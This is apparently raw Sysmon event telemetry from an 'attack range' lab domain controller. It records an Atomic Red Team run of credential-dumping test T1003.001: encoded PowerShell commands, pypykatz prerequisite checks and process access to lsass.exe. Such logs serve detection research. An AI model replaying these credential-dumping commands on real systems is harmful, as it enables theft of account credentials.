15:52:54.474{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004548Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.489{D28789B6-7CD6-5FA1-E400-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (cmd /c pypykatz -h) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 22542200x80000000000000004547Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.560{D28789B6-7CD4-5FA1-DE00-000000008801}3648github.com0::ffff:140.82.121.3;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000004546Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.271{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004545Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.271{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004544Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.224{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2f0vjpdv.rk4.ps12020-11-03 15:52:54.224 10341000x80000000000000004543Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.208{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004542Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004541Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004540Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004539Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004538Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004537Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004536Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004535Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004534Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004533Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004532Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004531Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004530Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.192{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004529Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.194{D28789B6-7CD6-5FA1-E300-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (pip3 -V) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 